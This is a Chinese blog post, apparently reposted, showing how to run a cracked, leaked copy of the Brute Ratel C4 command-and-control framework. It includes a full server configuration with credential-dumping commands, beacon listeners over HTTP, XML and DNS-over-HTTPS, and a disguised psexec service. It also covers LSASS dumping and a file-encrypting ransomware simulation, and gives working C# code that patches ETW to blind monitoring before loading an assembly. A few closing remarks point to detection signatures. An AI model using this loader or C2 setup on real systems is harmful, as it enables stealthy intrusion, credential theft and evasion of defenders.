咕咕咕,我是鸽子,我也不想写东西的啊,可是领导他请吃KFC诶。

bruteratel介绍

因为前几天 Brute Ratel 泄露了,VT 上可以下载,于是给大家简单分享一下它的使用方法。Brute Ratel 简称 BRC4,是一位印度开发者开发的 C2,泄露的版本为 1.2.2,最新版本应为 1.2.7,官网地址为:https://bruteratel.com/

像 CobaltStrike 一样是一个三端(服务端、客户端、植入端)的 C2,UI 使用 Qt 开发。网上泄露的版本为未破解版,无法直接使用,需要先进行破解,本文演示的是破解后的版本(注意:来源不明的泄露/破解二进制可能被植入后门,只应在隔离的实验环境中运行)。该 C2 主打 bypass/evasion,作者在推特上也经常分享该 C2 绕过 EDR 的视频。可能因为用户体量较小,该 C2 确实具有不错的免杀效果,但在以 IOA(攻击行为指标)为主、IOC 为辅的今天,再强的 C2 也免不了被查杀的下场。

bruteratel 使用

该 C2 目前只有 Linux 和 ARM 版本,服务端与客户端均为二进制文件。UI 因为使用 Qt,需要安装一些依赖库(高版本可能不需要这一步),作者也给出了安装命令:

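## client (Qt UI) dependencies
sudo apt-get install libqt5webenginewidgets5 libqt5websockets5
## server dependencies
# (the published text had this comment fused onto the command line, which would
#  have turned the whole server install into a comment)
sudo apt-get install nasm mingw-w64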

安装后可以启动Client:

然后启动Server:

目前 Server 提供了两种模式:socks 代理模式和普通 Server 模式,一般直接使用 Server 模式即可。Server 支持用 json 格式的配置文件直接启动,也支持通过命令行参数启动,如下:

 

其中用到的 ssl 证书文件也可以用作者给出的 sh 脚本直接生成。这里给出一个简单的配置文件供参考(注意:示例中的 admin_list/user_list 口令、comm_enc_key、c2_authkeys 均为弱示例值,实际使用前务必全部替换):

{    "admin_list": {        "admin": "admin@123"    },    "auto_save": false,    "click_script": {        "Credential Dumping": [            "samdump",            "shadowclone",            "dcsync"        ],        "Discovery": [            "id",            "pwd",            "ipstats",            "psreflect echo $psversiontable",            "net users",            "scquery"        ]    },    "autoruns": [        "set_child searchprotocolhost.exe",        "sleep 1"    ],    "c2_handler": "0.0.0.0:8443",    "comm_enc_key": "WeiJeeWeiCufae2y",    "credentials": [        {            "creddomain": "darkvortex.corp",            "crednote": "Domain Admin Password",            "credpass": "admin@123",            "creduser": "administrator"        }    ],    "listeners": {        "json-c2": {            "append": ""}",            "auth_count": 1,            "auth_type": false,            "c2_authkeys": [                "abcd@123"            ],            "c2_uri": [                "en/ec2/pricing/",                "?locale=en"            ],            "die_offline": false,            "extra_headers": {                "content-type": "application/json"            },            "host": "172.16.219.1",            "is_random": true,            "os_type": "windows",            "port": "443",            "prepend": "{"channel":"",            "rotational_host": "172.16.219.1",            "ssl": true,            "useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",            "proxy": "https://192.168.0.150:8081"        },        "xml-c2": {            "append": "n    nn",            "auth_count": 1,            "auth_type": false,            "c2_authkeys": [                "abcd@123"            ],            "c2_uri": [                "previous-versions/windows",                "latest/developerguide/documents-batch-xml.html"            ],            "die_offline": false,            "extra_headers": {      
          "Content-Type": "application/xhtml+xml"            },            "host": "172.16.219.1",            "is_random": true,            "os_type": "windows",            "port": "80",            "prepend":"nn    n        Gambardella, Matthewnn        Computern        44.95n        2000-10-01n        ",            "rotational_host": "172.16.219.1",            "ssl": true,            "useragent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"        },        "doh-c2": {            "auth_count": 1,            "auth_type": false,            "c2_authkeys": [                "abcd@123"            ],            "c2_uri": [                "dns-query"            ],            "extra_headers": {                "Content-Type": "application/dns-message"            },            "checkinA": "8.8.8.8",            "die_offline": false,            "dnshost": "dns1.evasionlabs.com,dns2.evasionlabs.com",            "rotational_host": "dns.google",            "host": "172.16.219.1",            "idleA": "8.8.4.4",            "spoofTxt": "google-site-verification=wD8N7i1JTNTkezJ49swvWW48f8_9xveREV4oB-0Hf5o",            "is_random": true,            "os_type": "windows",            "port": "53",            "ssl": true,            "useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36"        }    },    "payload_config": {        "main_smb": {            "c2_auth": "abcd@123",            "smb_pipe": "\\.\pipe\mynamedpipe",            "type": "SMB"        },        "main_tcp": {            "c2_auth": "abcd@123",            "host": "127.0.0.1",            "port": "10000",            "type": "TCP"        }    },    "psexec_config": {        "psexec_svc_desc": "Manages universal application core process that in Windows 8 and continues in Windows 10. 
It is used to determine whether universal apps installed from the Windows Store are declaring all of their permissions, like being able to access your telemetry, location or microphone. It helps to transact records of your universal apps with the trust and privacy settings of user.",        "psexec_svc_name": "TransactionBrokerService"    },    "ssl_cert": "cert.pem",    "ssl_key": "key.pem",    "user_list": {        "brute": "brute123",        "ratel": "ratel123"    },    "register_obj": {        "boftest64": {            "arch": "x64",            "file_path": "server_confs/sample_bof/decltest64.o",            "description": "Sample BOF file to show x64 capabilities",            "artifact": "WINAPI",            "mainArgs": "NA",            "optionalArg": "NA",            "example": "decltest64",            "minimumArgCount": 1        },        "boftest86": {            "arch": "x86",            "file_path": "server_confs/sample_bof/decltest86.o",            "description": "Sample BOF file to show x86 capabilities",            "artifact": "WINAPI",            "mainArgs": "NA",            "optionalArg": "NA",            "example": "decltest86",            "minimumArgCount": 1        }    },    "register_pe": {        "seatbelt": {            "file_path": "server_confs/Seatbelt.exe",            "description": "Runs Seatbelt C# executable",            "artifact": "WINAPI",            "mainArgs": "NA",            "optionalArg": "NA",            "example": "seatbelt",            "minimumArgCount": 1        }    },    "register_pe_inline": {        "monologue": {            "file_path": "server_confs/InternalMonologue.exe",            "description": "Runs InternalMonologue C# executable",            "artifact": "WINAPI",            "mainArgs": "NA",            "optionalArg": "NA",            "example": "monologue",            "minimumArgCount": 1        }    },    "register_dll": {        "boxreflect": {            "arch": "x64",            "file_path": 
"server_confs/boxreflect.dll",            "description": "Loads a test reflective dll message box",            "artifact": "WINAPI",            "mainArgs": "NA",            "optionalArg": "NA",            "example": "boxcheck",            "minimumArgCount": 1,            "replace_str": {                "boxit": "\x00\x00\x00\x00\x00",                "!This program cannot ": "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",                "be run in DOS mode.": "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"            }        }    },    "webhook_listener": {        "json-c2": {        "badger_init": false,        "badger_log": false,            "webhook_host": "https://localhost:9443"        }    }}

各字段含义可自行查阅文档,本文不是 profile 介绍文章,故不赘述。需要留意的是示例中 c2_handler 绑定在 0.0.0.0:8443,即团队服务器的管理端口对所有网卡开放,应通过防火墙或 SSH 隧道限制访问来源。启动后便可以连接到 Server 进行操作:

 

主操作界面比较容易上手,C4 profile 是添加监听器、修改配置的地方,包括设置 psexec 的服务名等(也可以在配置文件中设置,虽然用处不大)。

 

 

而 server 标签栏则包含已下载文件查看、证书查看,以及比较有趣的 ATT&CK 映射:

 

 

然后添加监听器、生成 payload,即可像 CS 一样上线(BRC4 中的 beacon 称为 badger)。监听器各字段不再多说,基本和 CS 区别不大。

 

然后生成载荷:

 

运行后成功上线:

 

一样的可以通过help查看所提供的命令:

 

另外其提供了LDAP查看功能,可以直接进行LDAP查询。

 

以及一个勒索模拟功能 Crypt Vortex,可以对文件进行加密(属于破坏性操作,只应在实验环境的测试文件上使用):

 

加密后对比:

 

对于命令操作来说,执行前需要先设置一个 Child 进程(如示例配置 autoruns 中的 set_child searchprotocolhost.exe):

 

然后便可使用相关功能,比如 dumplsass(据作者所说,该方法不调用 MiniDumpWriteDump,且整个过程全部通过 syscall 完成;这是作者的说法,本文未做验证):

 

运行 C# 程序集时会自动 patch ETW、AMSI:

 

 

下面是实现同等效果(patch EtwEventWrite 后加载并执行程序集)的自实现参考代码,并非 BRC4 源码:

using System;using System.Reflection;using System.Runtime.InteropServices;
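namespace Loader
{
    /// <summary>
    /// Minimal .NET loader used in the write-up to illustrate what BRC4 does before
    /// running a C# assembly: it overwrites the first byte of ntdll!EtwEventWrite
    /// with a RET so ETW providers in this process stop emitting events, then loads
    /// and runs an assembly from disk.
    /// </summary>
    internal class Program
    {
        [DllImport("kernel32", SetLastError = true)]
        private static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

        [DllImport("kernel32", SetLastError = true)]
        private static extern IntPtr LoadLibrary(string name);

        [DllImport("kernel32", SetLastError = true)]
        private static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

        // PAGE_EXECUTE_READWRITE (the magic 0x40 in the original).
        private const uint PageExecuteReadWrite = 0x40;

        /// <summary>
        /// Patches ntdll!EtwEventWrite in the current process to return immediately.
        /// </summary>
        /// <exception cref="InvalidOperationException">
        /// ntdll.dll or the EtwEventWrite export could not be resolved, or the page
        /// could not be made writable. The original discarded these failures and
        /// would have faulted inside Marshal.Copy instead.
        /// </exception>
        public static void PatchEtw()
        {
            IntPtr hNtdll = LoadLibrary("ntdll.dll");
            if (hNtdll == IntPtr.Zero)
            {
                throw new InvalidOperationException("LoadLibrary(ntdll.dll) failed, error " + Marshal.GetLastWin32Error());
            }

            IntPtr pEtwEventWrite = GetProcAddress(hNtdll, "EtwEventWrite");
            if (pEtwEventWrite == IntPtr.Zero)
            {
                throw new InvalidOperationException("GetProcAddress(EtwEventWrite) failed, error " + Marshal.GetLastWin32Error());
            }

            // 0xC3 = RET. This assumes the x64 calling convention; on x86 EtwEventWrite is
            // stdcall and the callee must pop its arguments, so a bare RET would corrupt the stack.
            byte[] patch = { 0xc3 };

            if (!VirtualProtect(pEtwEventWrite, (UIntPtr)patch.Length, PageExecuteReadWrite, out uint oldProtect))
            {
                throw new InvalidOperationException("VirtualProtect(RWX) failed, error " + Marshal.GetLastWin32Error());
            }

            try
            {
                Marshal.Copy(patch, 0, pEtwEventWrite, patch.Length);
            }
            finally
            {
                // Restore the original protection even if the copy faulted.
                VirtualProtect(pEtwEventWrite, (UIntPtr)patch.Length, oldProtect, out uint _);
            }

            // NOTE(review): this is an inline modification of ntdll's .text section; any defender
            // that compares the in-memory image with the on-disk one will see the changed byte.
        }

        /// <summary>
        /// Entry point: waits for the operator to inspect the process, patches ETW, then
        /// loads and executes the target assembly's entry point.
        /// </summary>
        /// <param name="args">
        /// Optional. args[0] is the path of the assembly to run; when absent the sample
        /// path from the write-up is used (the published text had lost its backslashes).
        /// </param>
        private static void Main(string[] args)
        {
            Console.WriteLine("Inspect the AppDomains, then press any key...");
            Console.ReadLine();

            PatchEtw();

            Console.WriteLine("ETW is patched! Recheck then press any key...");
            Console.ReadLine();

            string assemblyPath = args != null && args.Length > 0 ? args[0] : @"C:\Users\Example.exe";
            Assembly assembly = Assembly.LoadFrom(assemblyPath);

            MethodInfo entryPoint = assembly.EntryPoint;
            if (entryPoint == null)
            {
                throw new InvalidOperationException("Loaded assembly has no entry point: " + assemblyPath);
            }

            // A Main(string[] args) entry point takes one parameter; Invoke(null, null) would throw
            // TargetParameterCountException for it. Pass an empty argument array in that case.
            object[] parameters = entryPoint.GetParameters().Length == 0 ? null : new object[] { new string[0] };
            entryPoint.Invoke(null, parameters);
        }
    }
}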

新版 BRC4 中 AMSI、ETW 的绕过已经从直接 patch 内存改成了 patchless,利用硬件断点进行 bypass:https://ethicalchaos.dev/2022/04/17/in-process-patchless-amsi-bypass/

支持bof加载:

 

另外就是作者针对进程开发的一些功能,比如列出模块、列出导出表之类的:

 

自实现参考代码(启动 notepad 并枚举其已加载模块,并非 BRC4 源码):

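/// <summary>
/// Reference implementation of the "list modules of a process" feature: starts
/// notepad.exe and prints every module loaded in it (name, path, base address,
/// entry point), then the main module, and finally closes notepad.
/// </summary>
class ProcessModules
{
    /// <summary>
    /// Starts notepad, waits briefly for its modules to load, prints them and closes notepad.
    /// </summary>
    public void getModules()
    {
        // Process is IDisposable; the original never disposed it.
        using (Process myProcess = new Process())
        {
            // Process start information of notepad.
            myProcess.StartInfo = new ProcessStartInfo("notepad.exe");
            myProcess.Start();

            // Fixed delay, as in the original, so the process has mapped its modules
            // before they are enumerated (a load race is still possible).
            System.Threading.Thread.Sleep(1000);

            // NOTE(review): Process.Modules enumerates via the Win32 API and can throw
            // (e.g. a 32-bit caller inspecting a 64-bit process) — confirm the build target.
            ProcessModuleCollection modules = myProcess.Modules;
            Console.WriteLine("Properties of the modules associated with 'notepad' are:");

            // The published text lost the loop condition (the "<" was eaten as markup);
            // iterating over the collection's Count is the only well-formed reading.
            for (int i = 0; i < modules.Count; i++)
            {
                ProcessModule module = modules[i];
                Console.WriteLine("The moduleName is " + module.ModuleName);
                Console.WriteLine("The " + module.ModuleName + "'s File Name is: " + module.FileName);
                Console.WriteLine("The " + module.ModuleName + "'s base address is: " + module.BaseAddress);
                Console.WriteLine("For " + module.ModuleName + " Entry point address is: " + module.EntryPointAddress);
            }

            // The main module of 'myProcess'.
            ProcessModule mainModule = myProcess.MainModule;
            Console.WriteLine("The Main Module associated");
            Console.WriteLine("The process's main modulename is " + mainModule.ModuleName);
            Console.WriteLine("The process's main modulename  File Name is: " + mainModule.FileName);
            Console.WriteLine("The process's main modulename base address is: " + mainModule.BaseAddress);
            Console.WriteLine("The process's main modulename Entry point address is: " + mainModule.EntryPointAddress);

            // CloseMainWindow only posts a close request and returns false when there is no
            // main window yet; fall back to Kill so the spawned notepad is never left behind.
            if (!myProcess.CloseMainWindow())
            {
                myProcess.Kill();
            }
        }
    }
}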

 

针对内存的功能:可以设置内存分配方式,以及检测内存分配属性和线程执行方式:

 

 

额,不想写了,就这些吧。其实还有很多功能可以拿出来细说,但我实在是太懒了。至于检测,网上已有现成的 yara 规则;另外,示例配置中的默认值(如 psexec 服务名 TransactionBrokerService、命名管道 \\.\pipe\mynamedpipe、spoofTxt 中的 google-site-verification 字符串)若不修改,本身也都是现成的检测特征。

 

来源:千寻瀑


